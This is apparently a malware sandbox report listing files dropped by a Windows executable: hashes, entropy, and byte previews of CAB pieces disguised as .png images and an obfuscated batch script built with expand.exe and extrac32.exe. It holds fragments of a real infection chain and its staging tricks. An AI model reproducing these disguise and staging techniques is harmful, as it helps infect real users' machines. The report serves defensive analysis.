SHA-256:	A9CCBE80A39D6707F6F64838C4F0D8F96B86FD2D36855B795BDF59D4E7D4ACA6
SHA-512:	82A8C76770994308CA3E7EBE502D97C04524C7F2D4DD1843FA4C55B34EAC8C91198F6C92D44EEEF8F00A89BF5A43254BD5F85AEC2CFC1DB641EF5CB08815C212
Malicious:	false
Preview:	Set Airport=t..DOtWet(Architects(..MZXlEnables(Housing(Attempts(Ut(Constant(Yrs(Chapters(..zUSFork(Incorporated(Hawaiian(Girl(Contemporary(..ISvHeated(Slave(Lose(Started(Night(Switched(Outside(Maintaining(Airfare(..RcmsSoa(Bulk(Python(Requires(Florida(Avon(Pointed(Tribal(Lost(..BHDCEdt(Fitness(Fax(Extensions(..jcGrew(Drama(Usps(Stable(..UKWXHearings(..BXyThrows(..UZrrAttorney(Z(Pottery(..Set Cj=l..oBmRStuffed(Cultures(Chancellor(Lexmark(Titans(..cVETip(Rebate(Firefox(Portuguese(Thomson(..weJfForward(Curious(Routers(Encoding(Terminal(Judgment(Scroll(Underlying(..zXnChrysler(..aBImagine(Rage(Ron(Shepherd(Battlefield(Approaches(Directions(..EJNJoan(Servers(..LmZCounter(Advantage(Cho(Ot(..kpXhLiterally(Remind(Nation(..Set Prompt=A..twtAccused(Investment(Exhibit(Bids(Dow(Transaction(Bullet(Railway(Seattle(..byExtract(..RvBtPrefix(Strings(Steel(Colors(Compliance(..kcHorn(Frame(Terrorist(Hip(Majority(Theater(Impressive(Surgical(..gHNmPerformed(..nyVisitor(..eDWElectronics(Charges(Offers(Centr

C:\Users\user\AppData\Local\Temp\Lost

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	2572
Entropy (8bit):	5.367658021500566
Encrypted:	false
SSDEEP:	48:s9n9mTsCNvEQH5O5U1nPKrhBzM1FoMPhfq1koCqxLVJcd2u+Mh:gSEA5O5W+MfH5S1CqlVJcI6h
MD5:	F09F95AFFD74BAA8BBD9C8EB7E22CF7D
SHA1:	1BA0B1E18D871BB7D26E832B7D772ED5A9DC5DB2
SHA-256:	80750089F597C4DD20D5A3862D10477DF0AB87DFEB15E32109DF80AD350C3E24
SHA-512:	66D6891CE5DFE5476EB4313CD379A632D5A48F7393B7E86236A402530FD5281337FBE2193C38B95B5247999D7B35F3CDC429E2CDDE5A8286BAD8D513A4F8883E
Malicious:	false
Preview:	loops........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B...........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Lyrics

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	70656
Entropy (8bit):	6.66385731436992
Encrypted:	false
SSDEEP:	1536:Q/xv5mjKu2IwNnPEBiqXv+G/UXT6TvY464qvI932eOp:05mjccBiqXvpgF4qv+32eOp
MD5:	C814BFCD2221700BADBDF74B1DCF2BE4
SHA1:	9E1D9B67DDBB6D21FC857DE207279184D1C79C7D
SHA-256:	4DBBE56AB720CE60440980AE165DE15866A933FCD02A8D5C0135CCFA140803DD
SHA-512:	CE2B7B1920BD37003219167E07E19EBA6216D61F42FCAF59FC1F0C6BCB866666C7E6D3282E167E479F775F2A3E64D363A7ACF7AD27D6778E4875D8C339F2F9C5
Malicious:	false
Preview:	.U..%4.M....$S3.C....L.j..........l....e..3.....L..3.VW..4.M..}.S....[...w..O.3.W..E.}..E..Genu.E.5ineI.E..E.5ntel.E.3.@S....[.]...E..E...s..K..S.uC.E.%.?..=....t#=`...t.=p...t.=P...t.=`...t.=p...u..=8.M.....=8.M....=8.M..}...E.E.\|2j.X3.S....[.]...E..s..K..S..].......t.....=8.M....]._^.....tf....L....4.M..........tN.....tG3....E.U..E.M.......u....L......4.M........L... t... ..4.M........L.3.[..3.@.3.9.(#M.....U...$...Sj..p.....t..M..)j........$..........j.P..................................\|.....x...f......f......f..t...f..p...f..l...f..h...........E........E.................@.jP.......E.j.P.A....E.....E....@.E......E.....I.j..X...E..E.........E.....X.I..E.P..T.I...u...u.j......Y[..U...DjD.E.j.P.........E.P..l.I..E..t...E...j.X.......3..j.....I...t4.MZ..f9.u*.H<..9PE..u......f9A.u..yt.v........t....2..hQ.B...X.I..U..E....8csm.u%.x..u..@.= ...t.=!...t.="...t.=.@..t.3.]....f....%<.M.........h.0B.d.5.....D$..l$..l$.+.SVW...L.1E.3.P.e..u..E..E......E..E.d.......M.d.....

C:\Users\user\AppData\Local\Temp\Machinery

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	102400
Entropy (8bit):	6.245536035186267
Encrypted:	false
SSDEEP:	3072:6bLezW9FfTut/Dde6u640ewy4Za9coRC2jfTq8QLeAg0FuL:6bLezWWt/Dd314V14ZgP0JaAOL
MD5:	91634DE8EF9CF9B27C6CB388D9A73B0B
SHA1:	DB05E00AEE3F5C0BF2078882F60DBEBFF727E41B
SHA-256:	68D13FAC4666E6CBB46BBFB8FB0E9B1DF73F0B73CFC3B501CAC77E4174921B71
SHA-512:	3DEE8B8A27B538AE2A50326F531B64D2BDAF1F631DAC1F1B4083CBF50408AE655FBDF455DF4AE709FE5F58389563C495252CE9CD48F99848DF3A678E721A25D5
Malicious:	false
Preview:	..t..E..@..H..t...P...."...&.....L..L$........t..D$(..P.. ..........L..L$........t!.E..@..p....U....v..L$..!........ .L..L$........t&.......u.3.............F.............4.L..L$.......t.j....@.L..L$..z.....t.j....!........P.L..L$..Z.....t..D$(..P.q.........p.L..L$..7.....t.j.j.h.....6..H.I....&...L..L$........t)j.j.h.....6..H.I..p....?....C......3........L..L$........t%.D$...P.............D$..C..............L..L$.......t-.E..@..p.........F..0.D$.j.h.....0..H.I........L..L$.._.....t-.E..L$(Q.@..H.....P.........t:.D$(..P..r...X...L..L$.. .....t..E..@..H..I...P...%....u,...H..\|9...D9.t..@8.@......\|9...D9.t..@8.@...L$.......L$(......L$8....._^3.[..]...U..V.u....i.....u..u.........&..F.............j...:..3.^]...U..V.u....-.....u..u........&..F.............j..:..3.^]...U..V.u..........t.........$....u..u....[....&..F.....3.^]...U......@...SV..M.h..I..b...u.....+..j....K+......?...I...Y..A...y...t..@8..P.....t..@8.@......y...A.t..@8.@...G.L$..1(...L$.....D$.P.......L$..0.

C:\Users\user\AppData\Local\Temp\Msg

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	120832
Entropy (8bit):	6.6861464245574185
Encrypted:	false
SSDEEP:	3072:oKODOSpQSAU4CE0Imbi80PtCZEMnVIPPBxT/sA:miS+SAhClbfSCOMVIPPL/sA
MD5:	14EC14B0BD1CAE1952FABF565A3F001A
SHA1:	544EAC5D76A7DCB6CEE53E52DA5985242C66F8FF
SHA-256:	8F286A5908F0707C60085BCA49A958CE3FEFAB4D9A6662BFC774D55C877BB8DE
SHA-512:	48AF81657B2DCF7CCCD34F93C1B8A3F26AB61996E7344D1FA66A558B2B46680E2A841404E8B4083BD1250EB776569894A7FB83EAA9C80A59BE72E665B39A767E
Malicious:	false
Preview:	..M....M...3..3.j......YV.....Y.._^.=..M..t.3..VW.......u.....*V.....Y..u......P...M....M..o3..3.j......YV....Y.._^..U..QQSVW.}.3......<=t.B..Y...A..u.+.F.....u.B.j.P.51....YY..tm.]..R..Q...A..u.+.?=.A..E.t7j.P..1....YY..t0W.u.V._........uA.E.j..0....E..$....E.Y...?.u...S.#...j......YY3.j......Y_^..[..].3.PPPPP.......U..QQS.].3..E...VW.....f..t/j=[f;.t.B..y.f.....f;E.u.+....4N......f..u.]..B.j.P.H0....3.YY..ty.}..]..Q.f.....f;.u.+...j=.A.Y.E.f9.t8j.P..0....YY..t2S.u.V.........uC.E..03....V.E..+....E.Y..Cf93u...W.)...3.V.....YY..V.....Y.._^[..].3.PPPPP.#.....U..V.u...t...W....P..........Y..u.V.....Y_^]..W.=..M...u...._.SV3..QSSSSj..7SS....I....tLj.S.A/....YY..t5j.j.SVj..73.SS....I...t.SV.z...S.\.........9.u.3.^[_.V.F...Y.......U..Q...L.3.E.V..W.~....M.V....I..U.Y...;.u.M._3.^.......].....U..E...;...M.t.P.....Y]..U..E...;...M.t.P.....Y]..0...h8!C....M..v...hS!C....M..g....5..M......5..M.....YY..\|...j.h.L.......e...E..0.....Y.e...M.........u..E..................

C:\Users\user\AppData\Local\Temp\Olympus

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	72704
Entropy (8bit):	5.691750229843594
Encrypted:	false
SSDEEP:	768:nSLKPDvFQC7Vkr5M4INduPbOU7aI4kCD9vmPukxhSaAwuXc/mex/1:n08QuklMBNIimuzaAwusP/
MD5:	4F389DD938781155D0D90F90A86EEE5F
SHA1:	713EB99FEA885B848F8CA3173C1E7DD11098C529
SHA-256:	F6E51ACD504E0EB05524FB8ACBE39A7A0F59600D7345E8B9589650D69D7A9EEF
SHA-512:	7D833B769EA8C263389A5AEEF60439599153F836DEA539327C4A3ED74AAE7FA646154D6BA1DEE395AD8759BAAEB72E898BF9EC071E570A6C821D93A90243A3AE
Malicious:	false
Preview:	?...-..<.....{.?.5............?....SH.<.q.+...?.ye.t.b<................Mu...{.<`.w>.,....g5R.<t...Y..a..aN.`<.u.E...l{.]...<...lX..../p=.><...2.....c.nQ.<P[......{8.&T.<.-...B...?RbSQ.<zQ}<.r...S.?...<u.o.[..._/:>..<..h1......DAo.<.b.;..........<8bunz8......+G.<.\|.eEk..1..m...<...........r.7.<.........MuM.<..1.....J..]9.<..d..<..)}../.<.:7.q...^.s).<...4...mL.H..<"4.L.......%F..<)..!.......`.cC<-.a`.N..y.....n<.<........z..v<'6.....(...<.,.v..........<.O.V+4.......5.<.'.6Go...T...c.<)TH.....5.d+.2.<H!..o........<.U:.~$....s...<$"U.8b..qU..M..<.;.f.....G..+.<..e<......o . .<s_..u......."a.<.gBV._.....F.D.<...s....Ul...e<bN.6.....g.....<..L..%.........<.D..h....../..<.B...D_.Y..{<6w......<(...`.<...77...b. ..<ON..}..'.+..q<.........X4m.<d.]{f.......\|'.<\%>..U...Zsn.i.<..yUk....3.w..<..Z.......-.f$.<..O..3.........<F^..v....._...t<..K........0.ns<.R......Y....<K.W..g..h..l,kg<i... ......6.p.<{..J-.....=...t<.....X......PZ.<.2.......J.s..<^.{3...

C:\Users\user\AppData\Local\Temp\Page.png

Download File

Process:	C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe
File Type:	data
Category:	dropped
Size (bytes):	74752
Entropy (8bit):	7.997300968696696
Encrypted:	true
SSDEEP:	1536:jLLqscOS7M/5cZeAvWHtu1WqX2K9MOwJsw6EQECxNxrScgewfbfGAxy7ez8Kv:jM7MhQeqX1WqzWdqwByYswfbfG2yqzx
MD5:	B722532B2A6A8C4A64786F1C0DCDCFDE
SHA1:	47FDE21CAE6FBF9700F6E40CE47AC92D9BEB6819
SHA-256:	66C122975730DEADDFC2D562599D23B8444058933E518B48F0AF6157D8F38274
SHA-512:	0E43D9B71678F558540C16EBA3560C33DC11918C56136E43387E7E24A5DEA9D9E94008DEFAA80F3F301624AB242042374A5EB9DD0078A4025449A7B49B89ED1D
Malicious:	false
Preview:	....}.H.-.Q.L'..ff.G.....l.%.s.#L#[....Xd.Z...\D...._.X...f...F.A......4%...(+X"...#i.d5Nq...."\.'..yq...m..eu.U....+J.n1k2...........'..."....YD.e.>..1%.8R.lOH...a..SwW9.5............k.>..<..Z......5..y..a...kw{.7.T.:.M.6..)..f...e.hje.$.W.D.(.....x....M....<.r....y.CU.7[k%.......\|.......MBj.....-.q.FF.}dq..OF.`o......SD......U..i..t.....+.....Q#^..x`...wys.g......-...}.q.x.(f...n..(n... 3.RuQIw.".....p..>..Y..<f.9.R..Q..qv'...o..ClI.c..\4)~jD6.C.a[....^...........i..k.9....$.,..]..S..lE..(.m.`...{)..t..PF.4Be....q.e...x.~_./...!......4.......eo..d......el..M...[...J....q.+..e.....K.Q\f....Uw..C.7.TT....@.M"...1$..w..V.l.._..W.Q....._z+b..[00K%.8S.^u..7.L.D..e.....l...T/...u........FL0.30..#U.G.c.....B.~.u99O8..].....~..u..J.X......Y....{..R.....%6..~.g...,c.e..3T...`/.(S..N.v...X6......Q.8.E......5 .%.f...2D......S...Mp...@.M'g^........B....qyg#..Z.6...<.5}..?.v...s.=<b"...?.U..x1......V.C+..28.mp9h..."#(dv......?7......<.W..o......W.BT..x

C:\Users\user\AppData\Local\Temp\Peterson.png

Download File

Process:	C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe
File Type:	Microsoft Cabinet archive data, 490770 bytes, 11 files, at 0x2c +A "Pounds" +A "Inserted", ID 7466, number 1, 29 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	490770
Entropy (8bit):	7.998560628614396
Encrypted:	true
SSDEEP:	12288:5XfcUcbTinuvhpc5JA7VDNaO8PJ8NNQJGv1Ix:5EUa+qiIER839M
MD5:	2EF40AE2C0F16D91B83273699045D110
SHA1:	213349BC132AD4F7AFB2ADABB0322E98779109B9
SHA-256:	0E55F5635CDE538902A164EB18150E3C6C08C2EAB86ADA716C86EF8A9BA2203B
SHA-512:	7F06CE611F58FA59C5BB7404224173D6056BA8194ABE06C830D81D320D12D036B250153F4CB6B5EC7B84D532350AD411C93451FBFBD6E168475B85B8BA9A6A9C
Malicious:	false
Preview:	MSCF.....}......,................../.................fZ.. .Pounds...........fZ.. .Inserted..T........fZ.. .Isaac......8....fZ.. .Machinery.Qz........fZ.. .Withdrawal.....QB....fZ.. .Msg.....Q.....fZ.. .Olympus.....Q6....fZ.. .Blvd.....Q"....fZ.. .Lost.....],....fZ.. .Lyrics..4..]@....fZ.. .Comparison.D!.."U..CKu..\TU.8~...U..`T.R.Ei-9Z.......C......To.3i..vg..q.ke[[..km..V.X......hn.X.f......G%..y.;..?.p..?.y.9..3..Xx.....$..G[.,&I...(R)..N....\|..........G.^..`D..\|..-......R4x.\.m.!..Y...g.U....l...;{..hu..)...1j.}.FLj0."E..K.D5t.D.... ...>.-q....Kj(..k.@.Q..ba..!.$.8@.(H..v.4h....._...h67=./{$..~b..S....\|.;...s.M....-.....IO^.qJqL].a`.6`^5.?gK...h..t.........<.}?\|....lF_\|.>e...e..eeeF..V./.%..-Ewk.+.k....5_.u.?...T.?$I...W.i...g.x.../...1.....U@..i/.Q..V..?.\J.._....P.8v.A.@...C.j........cXx...j.p.Z...e...>...l..X%.P$0..ND.......?.`..=./.dl..ae.2.:W.@D4....}../<.UhQ+? .^......A....6S....6..T*.....F.....3.%...0J-....<...e...=.&........;])M_.

C:\Users\user\AppData\Local\Temp\Pounds

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	128000
Entropy (8bit):	6.353051002786251
Encrypted:	false
SSDEEP:	3072:Ag5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laW2UDQWfn:D5vPeDkjGgQaE/loUDtfn
MD5:	EAC467972CC2450F08AC006773DF2F50
SHA1:	FB1ACD152EB816F8A21C0F66B425999FBA64468A
SHA-256:	053987EE2BE517F413AEA9DBA1A9573BDF40692957AF2F90FC7F94FBC35654FA
SHA-512:	33C2AAEAC9235B0545FC527F98FD755B6A369CDD5AB1DBA4BA5A7807ADA89253D188F441B3452A2271AC499372FD903EF1D51931DCED0D81D997D1F00D949BBE
Malicious:	false
Preview:	..u..........>3._.F.....^]...U......`.D$.V.u.WP.D$.PV..............L$..@)M..T$..L$........T)M..L$.....8.\|$..............'........P............H..............a...WQ.P....7..<.I..t$...D.........d.........h.........P........D$.;F.t.P.....3.@_^..]....L$..N...3...U..V.u.;5t)M.........T)M........t.Q......T)M..... ...`)M...T)M.;5d)M.u....\|.....8.u.N...5d)M...X)M.^...v..D...8.t.]...I..X)M.j..4......T)M.YY..X)M..$....X)M....v..T)M...x)M....t)M...T...V..Np......NT....N$....N....h....V.C...YY..^...U..VW.}.........M...tF.E.S..t.;.....uH.^.....Q.........;...a...........h....V......E.YY..t.[j.j..7..X.I._^].....u.........M...t...6..V..j..N..V..F..4......F.YY.N.^.$...SVW..j._..l...............u.Nl.....N(...h....V.U...YY_..^[...U...u...(M......U...t...@)M.......y..u&...)M...u...M.........Qj..u...x.I.].....)M...U...u...(M..H.....@)M.......q.P.....j..u.j..u...x.I.]...U..M....t.W.}.........._]...V..4.I...(M.P..........t...@)M...j.....0.....^...U....SVW.}..E.P..7....I..E.l..

C:\Users\user\AppData\Local\Temp\Seminars.png

Download File

Process:	C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe
File Type:	data
Category:	dropped
Size (bytes):	58368
Entropy (8bit):	7.997219604440567
Encrypted:	true
SSDEEP:	1536:oBsTTA+LpkFk1oWEKvnJxRXjv4UmbycOdqX:oBsTTJLpfEKvR/mbmqX
MD5:	F05A2091CEAEC190F12846DDE74D6495
SHA1:	6F5AA6E68BFEBE0A847F5E1089F9364AC0E75054
SHA-256:	D46BB47AADDBFDF94CDB250842C9FCFB32DEEA10274984F15DB98D82B4A02FD1
SHA-512:	3C31CFBCAA2A62116FCA8F102EF39FBD843D5EC6E1B6F8E189BB1FF013151ED155F014BC55C2F56D8298BD7FDE6FC741D4ED5D4FE64E484C30BC1600E118288B
Malicious:	false
Preview:	9..Jg.M......n.I..}..}c.w..r`erl.w..A<.\|"h.]..K;......D._%wa]=..MF..4.lx...........k...V.n..l......Px..A...l.....H.[W....6"....'[.2].o....g.m.j.ff..=7.....>.6.uy..k(.JR.a..m2.l.K.y.."..0.IN..2.Y^f.?...1.e...oq).....r.S.U.].......Z.%..!..n.....\|.4.Qp...4..Qa.xv.......1.N.....U...jPE..T....f2ePl..?...N..]..Q..y.e...T...(.c.}.O.R.6..Y..H.........5+.....\...++T=5..]A.C...W.l.>A.@."b...\.1l.)X.....#p.1........3.Q.......37....~..)'7X.Z......m..fSF......ow......)...Q....AIu.W.....z..4..G...}.zx$/5i.i.&....N6.)7.b.(.3.D]..].o..0.2XU...'I....<?..Q_.3.4.../I..}.<]..<....&...%.a\\...V......T.@..=.t'.96.x.P#...O..DGFK..+h[k...AQ..w.1........N..-Z.P=S..].^..ZKw.&.o..C...##.c...EF....Map.<9........>;...m0.QI1..i..T.%.8m,..&P.p..N..HU....q..3..$#..B...d$xR.JW.G@.9.&.(.W.@.....K.#.^.......N..Cf....6.zS.."...}.].<:.u..X.oS{1..o..?...~:.qJ....3<Xu......^!p.........k.&Z.Q..Y..{..F.Y,.S..=.rz.\|...r.....o=c2.ydq...2p.........v.50.^<Y........K.P.A.r.kO.c6..

C:\Users\user\AppData\Local\Temp\Sims.png

Download File

Process:	C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe
File Type:	data
Category:	dropped
Size (bytes):	62016
Entropy (8bit):	7.997103649524646
Encrypted:	true
SSDEEP:	1536:A46GszLo+uavOHUYCERFOYfRoL4KMwnDJVLAyS6WOqQ0uKwiGkf:A4VsCA2bCE3DfWk6WOJnir
MD5:	277F03B7561725ED3703F6D6A7A23DCD
SHA1:	58B20CA99B3B8A42D545B0B2709E7AECBC4056DA
SHA-256:	FF868ED647AC63A729C7BAF3E0A784CDCEB29D49EDCB01A0106B20ECF47B83A4
SHA-512:	ABFD6D33A861F753782ADDE4ABCC6F43A844C4E3022BF4E6B58B6F970C8C052861CD05ED0FB470A50391D7069139602D8FC090BC84189295E11674B9689540A7
Malicious:	false
Preview:	.J..mJki?...e...,{?]..V.#....g`..:.f.i..^._.a..x..m".l..K.U.bI.]....jM..7.p..\|..O...Y....bB.....n.....z/.5. ._.c........&C/..koj........z^...)..k<..7.t..u..;..^..../@.(..3..........j~.s=.)..U.....zh..z%j-....pP.v'Q}.L5..g......%.I......=..+..5.e...B..9....c.h.)IL.m.A)Z.....N.....n9A.V..Sc.,R.?5..R~o)..,....<........nQ<..\Dn...O.r.e..FQi.KU.%...3}.....+.!..LC.6...1.e75....f........t...?C...M'A.v.tf\..nu..u.....B.k....R.$dm.R.....n%\.MsB.+...c...<G...^lD.h.. ...r~.;@.h.m/....l.z..,.p.:!.]).R..4..\..{}Dys....U.V.T....l.W..B.M..f.YY...P.*.[.. ..J.gq.L...[...k..Os\|DSN<m.C.#f.Z..tB..RZ.P.......A....z#m.I..Mz.,.....Se....._..F..n..E...W....,...}.f_4.d./.\.oj..oDq.C..4v....y.G..@...o..3..C...5U.7................s..2.....2..z.q..N..p...%.1....n.3n4......X..t.j......v.~...3.Wu.HSx>.}...:...m.}yQnv..k....Z....qC.........G.....!.k..\.......3.....x. ..$toAR...j..'...ei.W9...e......q...?....!..A...e.A\...E....9h.GX.X.x.cl1.,U..;...@D.qb......

C:\Users\user\AppData\Local\Temp\Trailers.png

Download File

Process:	C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe
File Type:	data
Category:	dropped
Size (bytes):	89088
Entropy (8bit):	7.9976403063111015
Encrypted:	true
SSDEEP:	1536:+fikESH7fVL99kevhdc62fsto9wLXp01Sk4M+GoylSKvFMIMLPt1:+qkHDZnZdc62fsto9wVmSk4MjPvGPt1
MD5:	A5AED6B17F31CCABFE64F5B19E4C3299
SHA1:	4B4CE1DB62716AEF6480ACADE603D672E0D11D52
SHA-256:	C3D60D772710D9D5E7251D183973E7B875A2BECC7AF09BD9BEF2CB726FF7624B
SHA-512:	F7B79C1898C7E9BB966752F36E82BCEBB0892524AD0A82444BD26880202E57FD746188ED26CFC92226300A83C738D29900F3B801D05A5194D99BA4D3992D5754
Malicious:	false
Preview:	...N.2.d{Tj..-S....O..gs&..i$2.....~o..y.m.E../g..N!.N.....Iz'Ur43.p......'.......FJE...k......JM;su6...47.S..H.6../-3K.X;G......Y.yF.........0...]K.U 3y...9.M.K..l...^.1Zg4)L...h.._.VT...R.x.i..D...s....._x.Nq.....3.aS.g..l.......(..n+&.h.A...-.X..!]3...j..t...k..w...c..P...!..YT=.D.0....]J&.....w.).{......H. %..a.zKP.......Q.`R@w.m..g. ......x.>.{c.h.:....5...'4........\|...oe.w..........h.s.35m.i....x..\|.=.............LF....4V......&o..[.[r\|M:h...i.Aif..l....2........C.p....A.......M.8K.`.L ..xZ...O..l./.Z.....y...F.w..../.7h..~.+.....le.......[.!..!.&..w.8.....{......\|aC..".j.G..r....n.).a9Z;a.....n..[.o..6<..wE!.".er.$m..J......-. u.-....!.<b......u..OD.1......A.\|.3T.Y..S...i{.N....'.F........q.H....v.@..y..y.O..(..{.0k.)..CO76..m...y...D...5[.....p.s..xWY...gm.6./..#U..~.0.f.T%.W6...N.k.@.m..s.S..i..'..j..xF#...j~3..f-.4.*.....+K.X.#y;.b.2h...>44..Q]U.....\|..,.1.....e,7;.1..pO..c....}.......r.....:.vB.........iS...o:?....J.

C:\Users\user\AppData\Local\Temp\Withdrawal

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	31313
Entropy (8bit):	7.193270701448389
Encrypted:	false
SSDEEP:	768:IQ1Dv7sMvLHfR/ZByLiFuO/ChgZ45VatJVEV3GPkjF:IODv7xvTphAiPChgZ2kOE6
MD5:	A0778F012A6DA9DFFAF3C69C4733F641
SHA1:	9F146C02328F52CC860E6349DB372C1007F1D261
SHA-256:	A5D2C3C6B0DFD5EA546FF8698CFE10C9A62C5BE89E79F62525AFEADDC2C2531D
SHA-512:	7987C471BB42163A6E9018B9537F00CD05F61744FCDEC127C25C9117B73D30C59AD94D0AA99BF4C95DED1790758D1C4C2A7559F77C29331441A7768B5000D1B6
Malicious:	false
Preview:	8<8B8F8L8V8`8j8u8}8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.9.9.9.9.9%9/999D9L9P9V9Z9`9j9t9~9.9.9.9.9.9.9.9.9.9.9.9.9.9.9.9.9.9.:.:.:.:%:):/:9:C:M:X:`:d:j:n:t:~:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.;.;.;';/;3;9;=;C;M;W;a;l;t;x;~;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.<.<.<.<.<&<0<;<C<G<M<Q<W<a<k<u<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.=.=.=.= =&=0=:=D=O=W=[=a=e=k=u=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.>.>.>&>*>0>4>:>D>N>X>c>k>o>u>y>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.?.?.?.?'?2?:?>?D?H?N?X?b?l?w?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?...........0.0.0.0.0.0'010;0F0N0R0X0\0b0l0v0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1.1.1.1!1'1+111;1E1O1Z1b1f1l1p1v1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.2.2.2.2)21252;2?2E2O2Y2c2n2v2z2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.3.3.3.3.3.3(323=3E3I3O3S3Y3c3m3w3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.4.4.4.4.4"4(424<4F4Q4Y4]4c4g4m4w4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.5.5.5 5(5,52565<5F5P5Z5e5m5q5w5{5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.6.6.6.6.6)646<6@6F6J6P6Z6d6n6y6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.7.

C:\Users\user\AppData\Local\Temp\labeled.png.bat

Download File

Process:	C:\Windows\SysWOW64\expand.exe
File Type:	ASCII text, with very long lines (2018), with CRLF line terminators
Category:	dropped
Size (bytes):	34935
Entropy (8bit):	5.087313738825535
Encrypted:	false
SSDEEP:	768:jzjDUGW05G8DVg8npS2wzjMxABDIvbzTVXXihQ69FUWgVDEUcV:EGE8Rwzjz9sU24ghM
MD5:	A7FBFB804E74F83A02711DE41FFB6265
SHA1:	22EEEDA7A692B6CC87F4CEEACCA49117B957813F
SHA-256:	A9CCBE80A39D6707F6F64838C4F0D8F96B86FD2D36855B795BDF59D4E7D4ACA6
SHA-512:	82A8C76770994308CA3E7EBE502D97C04524C7F2D4DD1843FA4C55B34EAC8C91198F6C92D44EEEF8F00A89BF5A43254BD5F85AEC2CFC1DB641EF5CB08815C212
Malicious:	false
Preview:	Set Airport=t..DOtWet(Architects(..MZXlEnables(Housing(Attempts(Ut(Constant(Yrs(Chapters(..zUSFork(Incorporated(Hawaiian(Girl(Contemporary(..ISvHeated(Slave(Lose(Started(Night(Switched(Outside(Maintaining(Airfare(..RcmsSoa(Bulk(Python(Requires(Florida(Avon(Pointed(Tribal(Lost(..BHDCEdt(Fitness(Fax(Extensions(..jcGrew(Drama(Usps(Stable(..UKWXHearings(..BXyThrows(..UZrrAttorney(Z(Pottery(..Set Cj=l..oBmRStuffed(Cultures(Chancellor(Lexmark(Titans(..cVETip(Rebate(Firefox(Portuguese(Thomson(..weJfForward(Curious(Routers(Encoding(Terminal(Judgment(Scroll(Underlying(..zXnChrysler(..aBImagine(Rage(Ron(Shepherd(Battlefield(Approaches(Directions(..EJNJoan(Servers(..LmZCounter(Advantage(Cho(Ot(..kpXhLiterally(Remind(Nation(..Set Prompt=A..twtAccused(Investment(Exhibit(Bids(Dow(Transaction(Bullet(Railway(Seattle(..byExtract(..RvBtPrefix(Strings(Steel(Colors(Compliance(..kcHorn(Frame(Terrorist(Hip(Majority(Theater(Impressive(Surgical(..gHNmPerformed(..nyVisitor(..eDWElectronics(Charges(Offers(Centr

\Device\ConDrv

Download File

Process:	C:\Windows\SysWOW64\expand.exe
File Type:	ASCII text, with CRLF, CR, LF line terminators
Category:	dropped
Size (bytes):	176
Entropy (8bit):	4.733829700187637
Encrypted:	false
SSDEEP:	3:RGXKRjN3MZ9aSLKLbzXDD9jmKXVM8/FAJoDYTzM/HbVTCVBoJxCVmWJzKkbow:zx3MmSLQHtBXVNsTaHmoPU5Ks7
MD5:	A559B973616C52D48046D4D9164546CA
SHA1:	F52EE618A8741F45BC0BF7F1B1AECDAE68E64E9A
SHA-256:	D24A448D6842136CF9B887970253B55CBA33E961AA73D9D37A1EA988BF070721
SHA-512:	B7C051F361BA1DA2EF5DFC438F6BA11F9DA504664B5E4392182087AD67E68E66E6FE6CA02CBE602C1DA424423E295B94B36E5F3BBB060E246251C47A2A5C6DF6
Malicious:	false
Preview:	Microsoft (R) File Expansion Utility..Copyright (c) Microsoft Corporation. All rights reserved.....Copying labeled.png to labeled.png.bat...labeled.png: 34935 bytes copied.....

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	4.3332253560683744
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
